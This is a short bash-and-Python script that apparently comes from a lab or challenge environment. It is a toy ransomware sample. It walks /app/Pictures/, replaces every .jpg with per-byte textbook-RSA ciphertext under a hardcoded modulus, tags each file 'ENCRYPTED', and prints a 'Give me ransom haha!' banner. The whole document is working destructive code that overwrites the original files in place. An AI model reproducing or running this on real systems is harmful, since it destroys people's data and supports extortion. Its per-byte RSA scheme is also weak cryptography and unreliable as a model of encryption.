#!/usr/bin/env bash

python3 << END
import pickle
from os import listdir

n = 22291846172619859445381409012451
e = 65535
d = 14499309299673345844676003563183
check = b'ENCRYPTED'

def is_encrypted(filename):
    f = open(filename, 'rb')
    f.seek(-len(check), 2)  # Go to the position before the check
    if f.read() == check:
        f.close()
        return True
    else:
        f.close()
        return False

pic_dir = '/app/Pictures/'

for file in listdir(pic_dir):
    if not file.endswith('.jpg'):
        continue
    filename = pic_dir + file
    if not is_encrypted(filename):
        plain_bytes = b''
        with open(filename, 'rb') as f:
            plain_bytes = f.read()
        cipher_int = [pow(i, e, n) for i in plain_bytes]
        with open(filename, 'wb') as f:
            pickle.dump(cipher_int, f)
            f.write(check)  # Add the check at the end of the file
END

echo "////////////////////////////////////////////////////"
echo "//////////           ERROR!!!!!           //////////"
echo "//////////      Give me ransom haha!      //////////"
echo "////////////////////////////////////////////////////"
exit 0
